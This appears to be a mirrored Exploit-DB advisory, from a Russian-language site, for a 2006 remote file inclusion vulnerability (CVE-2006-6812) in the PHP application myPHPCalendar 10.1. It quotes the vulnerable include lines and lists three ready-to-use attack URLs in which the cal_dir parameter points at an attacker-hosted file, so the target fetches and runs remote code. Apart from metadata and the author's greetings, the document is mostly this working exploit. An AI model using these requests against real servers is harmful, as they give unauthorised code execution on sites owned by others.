- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3019
- Проверка EDB
-
- Пройдено
- Автор
- CR@ZY_KING
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-6812
- Дата публикации
- 2006-12-26
Код:
# script name : myPHPCalendar
# Script Downloads : http://freshmeat.net/projects/myphpcalendar/
# Web Site : http://myphpcalendar.sourceforge.net/
# Version : 10.1
# Risk : High
# Found By : Cr@zy_King
# Thanks : | eTNR | ApAci | Eno7 | TheHacker | Kormali46 | The_Bekir |
Metallicali | Liz0zim | ERNE | Swat_Hack | Commander | Soceita
# Code :
include($cal_dir."vars.inc");
include($cal_dir."prefs.inc");
#Vuln : http://[target]/admin.php?cal_dir=http://[attacker]/
http://[target]/contacts.php?cal_dir=http://[attacker]/
http://[target]/convert-date.php?cal_dir=http://[attacker]/
#Contact: crazy_king[at]turkusev[dot]com
# ---------------------------Satbirlikleri.Org&SiberAktif.Net-----------------------------
# milw0rm.com [2006-12-26]- Источник
- www.exploit-db.com
